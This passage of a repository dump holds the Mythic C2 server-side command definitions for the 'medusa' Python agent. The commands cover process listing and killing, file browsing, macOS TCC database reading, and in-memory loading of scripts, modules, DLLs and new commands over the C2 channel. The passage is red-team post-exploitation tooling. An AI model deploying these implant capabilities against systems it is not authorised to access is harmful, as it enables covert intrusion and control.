3.8\"],\n        supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ],\n    )\n\n    async def create_tasking(self, task: MythicTask) -> MythicTask:\n        task.display_params = \"Sending stop signal for task with id: \" + task.args.get_arg(\"target_task_id\")\n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/jobs.py",
    "content": "from mythic_container.MythicCommandBase import *\nimport json\nfrom mythic_container.MythicRPC import *\n\nclass JobsArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = []\n\n    async def parse_arguments(self):\n        pass\n\n\nclass JobsCommand(CommandBase):\n    cmd = \"jobs\"\n    needs_admin = False\n    help_cmd = \"jobs\"\n    description = \"List running jobs\"\n    version = 1\n    is_exit = False\n    is_file_browse = False\n    is_process_list = False\n    is_download_file = False\n    is_remove_file = False\n    is_upload_file = False\n    author = \"@ajpc500\"\n    argument_class = JobsArguments\n    attackmapping = []\n    browser_script = BrowserScript(script_name=\"jobs\", author=\"@ajpc500\", for_new_ui=True)\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 2.7\", \"Python 3.8\"],\n        supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ],\n    )\n\n    async def create_tasking(self, task: MythicTask) -> MythicTask:\n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/kill.py",
    "content": "from mythic_container.MythicCommandBase import *\nimport json, re\nfrom mythic_container.MythicRPC import *\nimport sys\n\n\nclass KillArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = [\n            CommandParameter(\n                name=\"process_id\",\n                type=ParameterType.Number,\n                description=\"ID of Process to Terminate\",\n            )\n        ]\n\n    async def parse_arguments(self):\n        if len(self.command_line) > 0:\n            self.add_arg(\"process_id\", self.command_line)\n        \n    async def parse_dictionary(self, dictionary_arguments):\n        self.load_args_from_dictionary(dictionary_arguments)\n\n\nclass KillCommand(CommandBase):\n    cmd = \"kill\"\n    needs_admin = False\n    help_cmd = \"kill process_id\"\n    description = \"Terminate process by ID\"\n    version = 1\n    author = \"@ajpc500\"\n    attackmapping = []\n    supported_ui_features = [ \"process_browser:kill\" ] \n    argument_class = KillArguments\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 3.8\"],\n        supported_os=[ SupportedOS.Windows ],\n    )\n\n    async def create_tasking(self, task: MythicTask) -> MythicTask:\n        task.display_params = f\"Terminating process with PID: \" + str(task.args.get_arg(\"process_id\"))\n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/list_apps.py",
    "content": "from mythic_container.MythicCommandBase import *\nfrom mythic_container.MythicRPC import *\n\nclass ListAppsArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = []\n\n    async def parse_arguments(self):\n        pass\n\n\nclass ListAppsCommand(CommandBase):\n    cmd = \"list_apps\"\n    needs_admin = False\n    help_cmd = \"list_apps\"\n    description = \"This lists all running applications\"\n    version = 1\n    is_exit = False\n    is_file_browse = False\n    is_process_list = False\n    is_download_file = False\n    is_remove_file = False\n    is_upload_file = False\n    author = \"@ajpc500\"\n    argument_class = ListAppsArguments\n    attackmapping = []\n    browser_script = BrowserScript(script_name=\"list_apps\", author=\"@ajpc500\", for_new_ui=True)\n    attributes = CommandAttributes(\n        filter_by_build_parameter={\n            \"python_version\": \"Python 2.7\"\n        },\n        supported_python_versions=[\"Python 2.7\"],\n        supported_os=[SupportedOS.MacOS],\n    )\n\n    async def create_tasking(self, task: MythicTask) -> MythicTask:\n        resp = await MythicRPC().execute(\"create_artifact\", task_id=task.id,\n            artifact=\"NSWorkspace.sharedWorkspace().runningApplications()\",\n            artifact_type=\"API Called\",\n        )\n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/list_dlls.py",
    "content": "from mythic_container.MythicCommandBase import *\nfrom mythic_container.MythicRPC import *\nimport json\n\nclass ListDllsArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        super().__init__(command_line, **kwargs)\n        self.args = [\n            CommandParameter(\n                name=\"process_id\",\n                type=ParameterType.Number,\n                default_value=0,\n                parameter_group_info=[ParameterGroupInfo(\n                    required=False,\n                )],\n                description=\"ID of process to list loaded DLLs of, can be 0 for local process\",\n            )\n        ]\n\n    async def parse_arguments(self):\n        if len(self.command_line) > 0:\n            if self.command_line[0] == '{':\n                temp_json = json.loads(self.command_line)\n                self.add_arg(\"process_id\", temp_json[\"process_id\"])\n            else:\n                self.add_arg(\"process_id\", self.command_line)\n        \n    async def parse_dictionary(self, dictionary_arguments):\n        self.load_args_from_dictionary(dictionary_arguments)\n\nclass ListDllsCommand(CommandBase):\n    cmd = \"list_dlls\"\n    needs_admin = False\n    help_cmd = \"list_dlls [process_id]\"\n    description = \"List DLLs loaded in current or specified process\"\n    version = 1\n    is_exit = False\n    is_file_browse = False\n    is_process_list = False\n    is_download_file = False\n    is_remove_file = False\n    is_upload_file = False\n    author = \"@ajpc500\"\n    supported_ui_features = [\"process_dlls:list\"]\n\n    argument_class = ListDllsArguments\n    attackmapping = []\n    browser_script = BrowserScript(script_name=\"list_dlls\", author=\"@its_a_feature_\", for_new_ui=True)\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 3.8\"],\n        supported_os=[ SupportedOS.Windows ],\n    )\n\n    async def 
create_tasking(self, task: MythicTask) -> MythicTask:\n        process_id = task.args.get_arg(\"process_id\")\n        if process_id == 0:\n            task.display_params = f\"Listing DLLs loaded in current process\"\n        else:\n            task.display_params = f\"Listing DLLs loaded in process with PID: {process_id}\"\n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/list_modules.py",
    "content": "from mythic_container.MythicCommandBase import *\nfrom mythic_container.MythicRPC import *\nimport json\n\nclass ListModulesArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = [\n            CommandParameter(\n                name=\"module_name\",\n                type=ParameterType.String,\n                parameter_group_info=[ParameterGroupInfo(\n                    required=False\n                )],\n                description=\"Provide full file listing for a loaded module.\",\n            )\n        ]\n\n    async def parse_arguments(self):\n        if len(self.command_line) > 0:\n            if self.command_line[0] == \"{\":\n                self.load_args_from_json_string(self.command_line)\n            else:\n                self.add_arg(\"module_name\", self.command_line)\n\nclass ListModulesCommand(CommandBase):\n    cmd = \"list_modules\"\n    needs_admin = False\n    help_cmd = \"list_modules [module_name]\"\n    description = \"List Python modules loaded in-memory, or a full file listing for a specific module\"\n    version = 1\n    is_exit = False\n    is_file_browse = False\n    is_process_list = False\n    is_download_file = False\n    is_remove_file = False\n    is_upload_file = False\n    author = \"@ajpc500\"\n    argument_class = ListModulesArguments\n    attackmapping = []\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 2.7\", \"Python 3.8\"],\n        supported_os=[ SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ],\n    )\n\n    async def create_tasking(self, task: MythicTask) -> MythicTask:\n        task.display_params = f\"Listing modules loaded in-memory\"\n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, 
Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/list_tcc.py",
    "content": "from mythic_container.MythicCommandBase import *\nimport json\nfrom mythic_container.MythicRPC import *\nimport sys\n\n\nclass ListTccArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = [\n            CommandParameter(\n                name=\"db\",\n                type=ParameterType.String,\n                parameter_group_info=[ParameterGroupInfo(\n                    required=True\n                )],\n                default_value=\"/Library/Application Support/com.apple.TCC/TCC.db\",\n                description=\"Path to TCC database\",\n            )\n        ]\n\n    async def parse_arguments(self):\n        if len(self.command_line) > 0:\n            if self.command_line[0] == '{':\n                temp_json = json.loads(self.command_line)\n                self.add_arg(\"db\", temp_json[\"db\"])\n            else:\n                self.add_arg(\"db\", self.command_line)\n        else:\n            self.add_arg(\"db\", \"/Library/Application Support/com.apple.TCC/TCC.db\")\n        self.add_arg(\"tcc\", True, type=ParameterType.Boolean)\n\nclass ListTccCommand(CommandBase):\n    cmd = \"list_tcc\"\n    needs_admin = False\n    help_cmd = \"list_tcc [db_path]\"\n    description = \"Lists entries in TCC database (requires Full Disk Access)\"\n    version = 1\n    author = \"@ajpc500\"\n    attackmapping = []\n    supported_ui_features = []\n    argument_class = ListTccArguments\n    browser_script = BrowserScript(script_name=\"tcc\", author=\"@ajpc500\", for_new_ui=True)\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 2.7\", \"Python 3.8\"],\n        supported_os=[\n            SupportedOS.MacOS\n        ],\n    )\n\n    async def create_tasking(self, task: MythicTask) -> MythicTask:\n        task.display_params = \"Listing TCC database entries from \" + task.args.get_arg(\"db\")\n        return task\n\n    async def 
process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/load.py",
    "content": "from mythic_container.MythicCommandBase import *\nfrom mythic_container.MythicRPC import *\nimport json, base64, os\n\nclass LoadArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = [\n            CommandParameter(\n                name=\"command\",\n                type=ParameterType.ChooseOne,\n                description=\"Command to load into the agent\",\n                dynamic_query_function=self.get_commands\n            ),\n        ]\n\n    # async def get_commands(self, callback: dict) -> [str]:\n    async def get_commands(self, inputMsg: PTRPCDynamicQueryFunctionMessage) -> PTRPCDynamicQueryFunctionMessageResponse:\n        fileResponse = PTRPCDynamicQueryFunctionMessageResponse(Success=False)\n\n        callbacks = await SendMythicRPCCallbackSearch(MythicRPCCallbackSearchMessage(\n            SearchCallbackID=inputMsg.Callback,\n            AgentCallbackID=inputMsg.Callback\n        ))\n        \n        payload_os = \"\"\n        python_version = \"\"\n\n        if callbacks.Success:\n            payloads = await SendMythicRPCPayloadSearch(MythicRPCPayloadSearchMessage(\n                CallbackID=inputMsg.Callback, PayloadUUID=callbacks.Results[0].RegisteredPayloadUUID\n            ))\n            if payloads.Success:\n                payload_os = payloads.Payloads[0].SelectedOS\n                python_version = [param.Value for param in payloads.Payloads[0].BuildParameters if param.Name == 'python_version'][0]\n            else:\n                raise Exception(f\"Failed to get payload: {payloads.Error}\")\n        else:\n            raise Exception(f\"Failed to get callback: {callbacks.Error}\")\n        \n        all_cmds = await SendMythicRPCCommandSearch(MythicRPCCommandSearchMessage(\n            SearchPayloadTypeName=\"medusa\",\n            SearchOS=payload_os,\n            SearchAttributes={\n                
\"supported_python_versions\": [python_version],\n            },\n        ))\n\n        loaded_cmds = await SendMythicRPCCallbackSearchCommand(MythicRPCCallbackSearchCommandMessage(\n            CallbackID=inputMsg.Callback\n        ))\n\n        if not all_cmds.Success:\n            raise Exception(\"Failed to get commands for medusa agent: {}\".format(all_cmds.Error))\n        if not loaded_cmds.Success:\n            raise Exception(\"Failed to fetch loaded commands from callback {}: {}\".format(inputMsg.Callback, loaded_cmds.Error))\n\n        all_cmds_names = set([r.Name for r in all_cmds.Commands])\n        loaded_cmds_names = set([r.Name for r in loaded_cmds.Commands])\n        \n        logger.info(all_cmds_names)\n        logger.info(loaded_cmds_names)\n    \n        diff = all_cmds_names.difference(loaded_cmds_names)\n        fileResponse.Success = True\n        fileResponse.Choices = sorted(diff)\n        return fileResponse\n\n    \n    async def parse_arguments(self):\n        if self.command_line[0] != \"{\":\n            self.add_arg(\"command\", self.command_line)\n        else:\n            self.load_args_from_json_string(self.command_line)\n\n    async def parse_dictionary(self, dictionary_arguments):\n        self.load_args_from_dictionary(dictionary_arguments)\n\nclass LoadCommand(CommandBase):\n    cmd = \"load\"\n    needs_admin = False\n    help_cmd = \"load\"\n    description = \"This loads new functions into memory via the C2 channel.\"\n    version = 1\n    author = \"@ajpc500\"\n    parameters = []\n    attackmapping = [\"T1030\", \"T1129\"]\n    argument_class = LoadArguments\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 2.7\", \"Python 3.8\"],\n        supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ],\n    )\n\n\n\n\n    async def create_go_tasking(self, taskData: PTTaskMessageAllData) -> PTTaskCreateTaskingMessageResponse:\n        response = 
PTTaskCreateTaskingMessageResponse(\n            TaskID=taskData.Task.ID,\n            Success=True,\n        )\n\n        command = await SendMythicRPCCommandSearch(MythicRPCCommandSearchMessage(\n            SearchPayloadTypeName=\"medusa\",\n            SearchCommandNames=[taskData.args.get_arg(\"command\")],\n            SearchOS=taskData.Payload.OS\n        ))\n\n        py_ver = \"Python 3.8\"\n        build_params = taskData.BuildParameters\n        for build_param in build_params:\n            if build_param.Name == 'python_version':\n                py_ver = build_param.Value\n        \n        py_suffix = \".py2\" if py_ver == \"Python 2.7\" else \".py3\"\n\n        cmd_code = \"\"\n        if command.Success:\n            loadingCommand = \"\"\n            for cmd in command.Commands:\n                try:\n                    path = \"\"\n                    for func in os.listdir(self.agent_code_path):\n                        if (func.endswith(py_suffix) or func.endswith(\".py\")) and cmd.Name == func.split(\".\")[0]:\n                            path = func\n                            break\n                    code_path = self.agent_code_path / \"{}\".format(path)\n                    cmd_code = open(code_path, \"r\").read() + \"\\n\"\n                    loadingCommand = cmd.Name\n                except Exception as e:\n                    await SendMythicRPCResponseCreate(MythicRPCResponseCreateMessage(\n                        TaskID=taskData.Task.ID,\n                        Response=f\"Failed to find code for {cmd.Name}, skipping it\\n\".encode()\n                    ))\n\n            if cmd_code != \"\":\n                resp = await SendMythicRPCFileCreate(MythicRPCFileCreateMessage(\n                    TaskID=taskData.Task.ID,\n                    Comment=f\"Loading the following command: {loadingCommand}\\n\",\n                    FileContents=cmd_code.encode(),\n                    Filename=f\"medusa load command\",\n                    DeleteAfterFetch=True\n           
     ))\n                if resp.Success:\n                    taskData.args.add_arg(\"file_id\", resp.AgentFileId)\n                    response.DisplayParams = f\"command: {loadingCommand}\"\n                else:\n                    raise Exception(\"Failed to register file: \" + resp.Error)\n            else:\n                response.Completed = True\n                response.DisplayParams = f\"no command\"\n                return response\n        else:\n            raise Exception(\"Failed to fetch commands from Mythic: \" + command.Error)\n        \n        return response\n\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/load_dll.py",
    "content": "from mythic_container.MythicCommandBase import *\nfrom mythic_container.MythicRPC import *\nimport json\n\nclass LoadDllArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = [\n            CommandParameter(\n                name=\"dllpath\",\n                type=ParameterType.String,\n                parameter_group_info=[ParameterGroupInfo(\n                    required=True,\n                    ui_position=1\n                )],\n                description=\"Location of on-disk DLL\",\n            ),\n            CommandParameter(\n                name=\"dllexport\",\n                type=ParameterType.String,\n                parameter_group_info=[ParameterGroupInfo(\n                    required=True,\n                    ui_position=2\n                )],\n                description=\"Export of target DLL\",\n            ),\n        ]\n\n    async def parse_arguments(self):\n        if self.command_line[0] != \"{\":\n            pieces = self.command_line.split(\" \")\n            if len(pieces) == 2:\n                self.add_arg(\"dllpath\", pieces[0])\n                self.add_arg(\"dllexport\", pieces[1])\n            else:\n                raise Exception(\"Wrong number of parameters, should be 2\")\n        else:\n            self.load_args_from_json_string(self.command_line)\n\nclass LoadDllCommand(CommandBase):\n    cmd = \"load_dll\"\n    needs_admin = False\n    help_cmd = \"load_dll dll_path dll_export\"\n    description = \"Load DLL from disk\"\n    version = 1\n    author = \"@ajpc500\"\n    attackmapping = [ \"T1059.006\", \"T1127\" ]\n    argument_class = LoadDllArguments\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 2.7\", \"Python 3.8\"],\n        supported_os=[SupportedOS.Windows],\n    )\n\n    async def create_tasking(self, task: MythicTask) -> MythicTask:\n        task.display_params = 
\"Executing \" + str(task.args.get_arg(\"dllpath\")) + \" with export '\"\n        task.display_params += str(task.args.get_arg(\"dllexport\")) + \"'\"\n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/load_module.py",
    "content": "from mythic_container.MythicCommandBase import *\nfrom mythic_container.MythicRPC import *\nimport json\nimport sys\nimport base64\n\nclass LoadModuleArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = [\n            CommandParameter(\n                name=\"file\", type=ParameterType.File, description=\"Zipped library to upload\"\n            ),\n            CommandParameter(\n                name=\"module_name\",\n                type=ParameterType.String,\n                description=\"Name of module to load, e.g. cryptography\"\n            )\n        ]\n\n    async def parse_arguments(self):\n        if len(self.command_line) > 0:\n            if self.command_line[0] == \"{\":\n                self.load_args_from_json_string(self.command_line)\n            else:\n                raise ValueError(\"Missing JSON arguments\")\n        else:\n            raise ValueError(\"Missing arguments\")\n\n\nclass LoadModuleCommand(CommandBase):\n    cmd = \"load_module\"\n    needs_admin = False\n    help_cmd = \"load_module\"\n    description = (\n        \"Upload a python library and load it in-memory\"\n    )\n    version = 1\n    author = \"@ajpc500\"\n    attackmapping = []\n    argument_class = LoadModuleArguments\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 2.7\", \"Python 3.8\"],\n        supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ],\n    )\n\n\n    async def create_tasking(self, task: MythicTask) -> MythicTask:\n        try:\n            file_resp = await MythicRPC().execute(\n                \"get_file\", \n                task_id=task.id,\n                file_id=task.args.get_arg(\"file\"),\n                get_contents=False\n            )\n            if file_resp.status == MythicRPCStatus.Success:\n                if len(file_resp.response) > 0:\n                    task.display_params 
= f\"Loading {task.args.get_arg('module_name')} module into memory\"\n                elif len(file_resp.response) == 0:\n                    raise Exception(\"Failed to find the named file. Have you uploaded it before? Did it get deleted?\")\n            else:\n                raise Exception(\"Error from Mythic RPC: \" + str(file_resp.error))\n        \n            file_resp = await MythicRPC().execute(\"update_file\",\n                file_id=task.args.get_arg(\"file\"),\n                delete_after_fetch=True,\n                comment=\"Uploaded into memory for load_module\")\n        \n        \n        except Exception as e:\n            raise Exception(\"Error from Mythic: \" + str(sys.exc_info()[-1].tb_lineno) + str(e))\n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/load_script.py",
    "content": "from mythic_container.MythicCommandBase import *\nfrom mythic_container.MythicRPC import *\nimport json\nimport sys\nimport base64\n\nclass LoadScriptArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = [\n            CommandParameter(\n                name=\"file\", \n                type=ParameterType.File, \n                description=\"script to load\"\n            )\n        ]\n\n    async def parse_arguments(self):\n        if len(self.command_line) > 0:\n            if self.command_line[0] == \"{\":\n                self.load_args_from_json_string(self.command_line)\n            else:\n                raise ValueError(\"Missing JSON arguments\")\n        else:\n            raise ValueError(\"Missing arguments\")\n\n\nclass LoadScriptCommand(CommandBase):\n    cmd = \"load_script\"\n    needs_admin = False\n    help_cmd = \"load_script\"\n    description = (\n        \"Load a Python script into the agent. 
Functions in the script can be added to the agent class with setattr() and called with the eval_code function if needed\"\n    )\n    version = 1\n    author = \"@ajpc500\"\n    attackmapping = []\n    argument_class = LoadScriptArguments\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 2.7\", \"Python 3.8\"],\n        supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ],\n    )\n\n    async def create_tasking(self, task: MythicTask) -> MythicTask:\n        file_resp = await MythicRPC().execute(\n                \"get_file\", \n                task_id=task.id,\n                file_id=task.args.get_arg(\"file\"),\n                get_contents=False\n            )\n        if file_resp.status == MythicStatus.Success:\n            original_file_name = file_resp.response[0][\"filename\"]\n            task.display_params = f\"Loading script: {original_file_name}\"\n        else:\n            raise Exception(\"Failed to register file: \" + file_resp.error)\n        \n        file_resp = await MythicRPC().execute(\"update_file\",\n                file_id=task.args.get_arg(\"file\"),\n                delete_after_fetch=True,\n                comment=\"Uploaded into memory for load_script\")\n        \n        \n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/ls.py",
    "content": "from mythic_container.MythicCommandBase import *\nimport json\nfrom mythic_container.MythicRPC import *\nimport sys\n\n\nclass LsArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = [\n            CommandParameter(\n                name=\"path\",\n                type=ParameterType.String,\n                parameter_group_info=[ParameterGroupInfo(\n                    required=False\n                )],\n                description=\"Path of file or folder on the current system to list\",\n            )\n        ]\n\n    async def parse_arguments(self):\n        if len(self.command_line) > 0:\n            if self.command_line[0] == '{':\n                temp_json = json.loads(self.command_line)\n                if \"host\" in temp_json:\n                    self.add_arg(\"path\", temp_json[\"path\"] + \"/\" + temp_json[\"file\"])\n                    self.add_arg(\"file_browser\", True, type=ParameterType.Boolean)\n                else:\n                    self.add_arg(\"path\", temp_json[\"path\"])\n            else:\n                self.add_arg(\"path\", self.command_line)\n        else:\n            self.add_arg(\"path\", \".\")\n\nclass LsCommand(CommandBase):\n    cmd = \"ls\"\n    needs_admin = False\n    help_cmd = \"ls [/path/to/file]\"\n    description = \"Get attributes about a file and display it to the user via API calls. 
No need for quotes and relative paths are fine\"\n    version = 1\n    author = \"@ajpc500\"\n    attackmapping = [\"T1083\"]\n    supported_ui_features = [\"file_browser:list\"]\n    is_file_browse = True\n    argument_class = LsArguments\n    browser_script = BrowserScript(script_name=\"ls\", author=\"@its_a_feature_\", for_new_ui=True)\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 2.7\", \"Python 3.8\"],\n        supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ],\n    )\n\n    async def create_tasking(self, task: MythicTask) -> MythicTask:\n        if task.args.has_arg(\"file_browser\") and task.args.get_arg(\"file_browser\"):\n            host = task.callback.host\n            task.display_params = host + \":\" + task.args.get_arg(\"path\")\n        else:\n            task.display_params = task.args.get_arg(\"path\")\n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/mv.py",
    "content": "from mythic_container.MythicCommandBase import *\nfrom mythic_container.MythicRPC import *\nimport json\n\nclass MvArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = [\n            CommandParameter(\n                name=\"destination\",\n                type=ParameterType.String,\n                parameter_group_info=[ParameterGroupInfo(\n                    required=True,\n                    ui_position=2\n                )],\n                description=\"Location for moved file or folder\",\n            ),\n            CommandParameter(\n                name=\"source\",\n                type=ParameterType.String,\n                parameter_group_info=[ParameterGroupInfo(\n                    required=True,\n                    ui_position=1\n                )],\n                description=\"Path to file or folder for moving\",\n            ),\n        ]\n\n    async def parse_arguments(self):\n        if self.command_line[0] != \"{\":\n            pieces = self.command_line.split(\" \")\n            if len(pieces) == 2:\n                self.add_arg(\"source\", pieces[0])\n                self.add_arg(\"destination\", pieces[1])\n            else:\n                raise Exception(\"Wrong number of parameters, should be 2\")\n        else:\n            self.load_args_from_json_string(self.command_line)\n\nclass MvCommand(CommandBase):\n    cmd = \"mv\"\n    needs_admin = False\n    help_cmd = \"mv source destination\"\n    description = \"Move file or folder to destination\"\n    version = 1\n    author = \"@ajpc500\"\n    attackmapping = []\n    argument_class = MvArguments\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 2.7\", \"Python 3.8\"],\n        supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ],\n    )\n\n    async def create_tasking(self, task: MythicTask) -> MythicTask:\n        
task.display_params = \"Moving \" + str(task.args.get_arg(\"source\")) + \" to \"\n        task.display_params += str(task.args.get_arg(\"destination\"))\n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/pip_freeze.py",
    "content": "from mythic_container.MythicCommandBase import *\nimport json\nfrom mythic_container.MythicRPC import *\n\nclass PipFreezeArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = []\n\n    async def parse_arguments(self):\n        pass\n\n\nclass PipFreezeCommand(CommandBase):\n    cmd = \"pip_freeze\"\n    needs_admin = False\n    help_cmd = \"pip_freeze\"\n    description = \"This programmatically lists all installed modules.\"\n    version = 1\n    is_exit = False\n    is_file_browse = False\n    is_process_list = False\n    is_download_file = False\n    is_remove_file = False\n    is_upload_file = False\n    author = \"@ajpc500\"\n    argument_class = PipFreezeArguments\n    attackmapping = []\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 2.7\", \"Python 3.8\"],\n        supported_os=[ SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ],\n    )\n\n    async def create_tasking(self, task: MythicTask) -> MythicTask:\n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/ps.py",
    "content": "from mythic_container.MythicCommandBase import *\nimport json\nfrom mythic_container.MythicRPC import *\nimport sys\n\n\nclass PsArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = []\n\n    async def parse_arguments(self):\n        pass\n\n\nclass PsCommand(CommandBase):\n    cmd = \"ps\"\n    needs_admin = False\n    help_cmd = \"ps\"\n    description = \"Get limited process listing\"\n    version = 2\n    author = \"@ajpc500\"\n    attackmapping = [\"T1106\"]\n    supported_ui_features = [\"process_browser:list\"]\n    argument_class = PsArguments\n    browser_script = BrowserScript(script_name=\"ps\", author=\"@ajpc500\", for_new_ui=True)\n    attributes = CommandAttributes(\n        supported_python_versions=[ \"Python 2.7\", \"Python 3.8\" ],\n        supported_os=[ SupportedOS.Windows, SupportedOS.Linux ],\n    )\n\n    async def create_tasking(self, task: MythicTask) -> MythicTask:\n        task.display_params = \"Getting limited process listing\"\n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/ps_full.py",
